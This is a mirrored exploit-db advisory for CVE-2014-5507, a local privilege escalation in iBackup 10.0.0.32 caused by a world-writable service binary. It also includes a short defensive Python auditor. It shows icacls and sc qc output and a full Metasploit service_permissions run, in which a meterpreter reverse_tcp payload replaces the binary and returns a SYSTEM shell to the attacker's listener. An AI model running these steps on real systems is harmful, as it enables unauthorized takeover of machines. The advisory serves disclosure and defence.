iBackup 10.0.0.32 - Local Privilege Escalation

Published: 22 Oct 2014 00:00:00
Reported by: Glafkos Charalambous
Type: exploitdb
Source: www.exploit-db.com

iBackup version 10.0.0.32 allows local privilege escalation by exploiting weak file permissions, enabling an attacker to execute arbitrary code with SYSTEM privileges upon service restart or system reboot

Related

Reporter | Title | Published | Family
0day.today | iBackup 10.0.0.32 - Local Privilege Escalation Vulnerability | 22 Oct 2014 00:00 | zdt
CVE | CVE-2014-5507 | 3 Nov 2014 16:00 | cve
Cvelist | CVE-2014-5507 | 3 Nov 2014 16:00 | cvelist
EUVD | EUVD-2014-5394 | 7 Oct 2025 00:30 | euvd
exploitpack | iBackup 10.0.0.32 - Local Privilege Escalation | 22 Oct 2014 00:00 | exploitpack
NVD | CVE-2014-5507 | 3 Nov 2014 16:55 | nvd
OpenVAS | iBackup Local Privilege Escalation Vulnerability - Windows | 1 Dec 2014 00:00 | openvas
Prion | Design/Logic Flaw | 3 Nov 2014 16:55 | prion
seebug.org | iBackup 10.0.0.32 - Local Privilege Escalation | 13 Nov 2014 00:00 | seebug

# Exploit Title: iBackup <= 10.0.0.32 Local Privilege Escalation
# Date: 23/01/2014
# Author: Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>
# Version: 10.0.0.32
# Vendor: IBackup
# Vendor URL: https://www.ibackup.com/
# CVE-2014-5507


Vulnerability Details
The default IBackupWindows installation sets weak file permissions: Everyone is allowed to replace
ib_service.exe with an executable of their choice. When the service restarts or the system reboots,
the attacker's payload executes on the system with SYSTEM privileges.


C:\Users\0x414141>icacls "C:\Program Files\IBackupWindows\ib_service.exe"
C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F)
                                               NT AUTHORITY\SYSTEM:(I)(F)
                                               BUILTIN\Administrators:(I)(F)
                                               BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files


C:\Users\0x414141>sc qc IBService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: IBService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\IBackupWindows\ib_service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : IBackup Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
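
A defender-side check for the condition shown in the two listings above, as an added example that is not part of the original advisory: it parses `sc qc` and `icacls` output and reports any non-administrative principal that can modify the binary of a service running as LocalSystem. The function names and the TRUSTED, WRITE_RIGHTS and PRIVILEGED_ACCOUNTS sets are assumptions made for this example.

```python
import re
# Constructed sample input: the icacls and sc qc output quoted in this advisory.
ICACLS_OUT = r"""C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F)
                                               NT AUTHORITY\SYSTEM:(I)(F)
                                               BUILTIN\Administrators:(I)(F)
                                               BUILTIN\Users:(I)(RX)
"""
SC_QC_OUT = r"""SERVICE_NAME: IBService
        BINARY_PATH_NAME   : "C:\Program Files\IBackupWindows\ib_service.exe"
        SERVICE_START_NAME : LocalSystem
"""
# Assumption: these principals are already fully privileged, so their write access is expected.
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\ADMINISTRATORS", "NT SERVICE\\TRUSTEDINSTALLER"}
# icacls rights that let a principal replace or alter the file (or its ACL/owner).
WRITE_RIGHTS = {"F", "M", "W", "D", "DE", "WD", "AD", "WDAC", "WO", "GA", "GW"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
PRIVILEGED_ACCOUNTS = {"localsystem", "nt authority\\system"}
ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<flags>(?:\([^)]*\))+)$")

def parse_icacls(output, path):
    """Return (principal, inherited, rights) for each ACE in one file's icacls listing."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()  # first ACE shares a line with the path
        m = ACE_RE.match(line)
        if m:  # skips blank lines and the "Successfully processed" summary
            groups = re.findall(r"\(([^)]*)\)", m["flags"])
            tokens = {t.strip().upper() for g in groups for t in g.split(",")}
            aces.append((m["who"], "I" in tokens, tokens - INHERIT_FLAGS))
    return aces

def service_config(sc_output):
    """Parse `sc qc` output into {field: value}; split on the first colon only."""
    pairs = (line.partition(":") for line in sc_output.splitlines())
    return {k.strip(): v.strip() for k, sep, v in pairs if sep}

def audit(sc_output, icacls_output):
    """List non-admin principals able to modify the binary of a LocalSystem service."""
    cfg = service_config(sc_output)
    m = re.match(r'"([^"]+)"|(\S+)', cfg["BINARY_PATH_NAME"])
    path = m.group(1) or m.group(2)
    if cfg.get("SERVICE_START_NAME", "").lower() not in PRIVILEGED_ACCOUNTS:
        return []
    return [{"service": cfg["SERVICE_NAME"], "path": path, "principal": who,
             "rights": sorted(rights & WRITE_RIGHTS), "inherited": inherited}
            for who, inherited, rights in parse_icacls(icacls_output, path)
            if who.upper() not in TRUSTED and "DENY" not in rights and rights & WRITE_RIGHTS]
```

The `inherited` field reflects the `(I)` flag: the Everyone entry is inherited from a parent folder, so the ACL that needs correcting is on the install directory rather than on the file alone.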



msf exploit(service_permissions) > sessions 

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  1   meterpreter x86/win32  0x414141-PC\0x414141 @ 0x414141-PC  192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)



msf exploit(service_permissions) > show options 

Module options (exploit/windows/local/service_permissions):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AGGRESSIVE  true             no        Exploit as many services as possible (dangerous)
   SESSION     1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.0.100    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(service_permissions) > exploit 

[*] Started reverse handler on 192.168.0.100:4444 
[*] Meterpreter stager executable 15872 bytes long being uploaded..
[*] Trying to add a new service...
[*] No privs to create a service...
[*] Trying to find weak permissions in existing services..
[*] IBService has weak file permissions - C:\Program Files\IBackupWindows\ib_service.exe moved to C:\Program Files\IBackupWindows\ib_service.exe.bak and replaced.
[*] Restarting IBService
[*] Could not restart IBService. Wait for a reboot. (or force one yourself)

Upon Reboot or Service Restart

[*] Sending stage (770048 bytes) to 192.168.0.102
[*] Meterpreter session 2 opened (192.168.0.100:4444 -> 192.168.0.102:14852) at 2014-07-21 00:52:36 +0300
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background 
[*] Backgrounding session 2...

msf exploit(service_permissions) > sessions -l

Active sessions
===============

  Id  Type                   Information                       Connection
  --  ----                   -----------                       ----------
  1   meterpreter x86/win32  0x414141-PC\0x414141 @ 0x414141-PC  192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ 0x414141-PC  192.168.0.100:4444 -> 192.168.0.102:14852 (192.168.0.102)

Vulners AI Score: 6.9 (Medium risk)
CVSS 2: 7.2
EPSS: 0.01131